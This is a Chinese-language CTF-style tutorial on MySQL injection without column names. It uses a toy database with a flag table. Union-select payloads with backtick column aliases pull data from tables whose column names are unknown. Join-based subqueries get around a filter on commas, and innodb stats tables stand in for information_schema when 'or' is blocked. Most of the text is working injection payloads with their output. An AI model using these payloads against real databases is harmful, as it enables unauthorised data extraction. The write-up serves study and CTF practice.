0%

SQL注入之无列名注入

前言

当sql过滤了or时,无法从information_schema数据库查出列名。但是存在innodb_index_statsinnodb_index_table两张表(mysql版本大于5.6.3),可以查询出表名,再进行无列名注入

https://dev.mysql.com/doc/relnotes/mysql/5.6/en/news-5-6-3.html

img

示例

题目语句为 select * from test where id=x

当前数据库有两张表

flllllag

id flag
1 flag{3690c6f6-fe49-11e9-bf58-005056c00001}

test

id title content
1 hello tinmin

flllllag表有两列,

有:

1
2
mysql> select 1,2 union select * from flllllag;
mysql> select * from (select 1,2 union select * from flllllag)a;

select 1,2 union select * from flllllag

1 2
2 flag{3690c6f6-fe49-11e9-bf58-005056c00001}

test表 三列

union select 要保持列一样

  • select 1,`2`,3 from (select 1,2 union select * from flllllag)

`2` 指取from结果的第二列

1 2 3
1 2 3
1 flag{3690c6f6-fe49-11e9-bf58-005056c00001} 3

select * from test union select 1,`2`,3 from (select 1,2 union select * from flllllag)a;

结果就是:

id title content
1 hello tinmin
1 2 3
1 flag{3690c6f6-fe49-11e9-bf58-005056c00001} 3

过滤逗号

回顾过滤逗号的语句

select * from test union select 1,2,3

等同于

select * from test union select * from (select 1)a join (select 2)b join (select 3)c

回到语句

select * from test union select 1,2,3 from (select 1,2 union select * from flllllag)a;

  • select * from test union select * from (select 1)a join (select 2)b join(select 2 from (select 1,2 union select * from flllllag)i)k;

` 叫 backticks

平时sql语句喜欢用:

select id from user

规范写法:

select `id` from user

同样为查询id列

2是查询表头为2的列

还可以

选取列查

1
select * from (select 1,2)a
1 2
1 2
1
select a.1 from (select 1,2)a
1
1
1
select a.2 from (select 1,2)a
2
2

保证join一列

  • select * from test union select * from (select 1)a join (select 2)b join(select i.2 from (select 1,2 union select * from flllllag)i)k;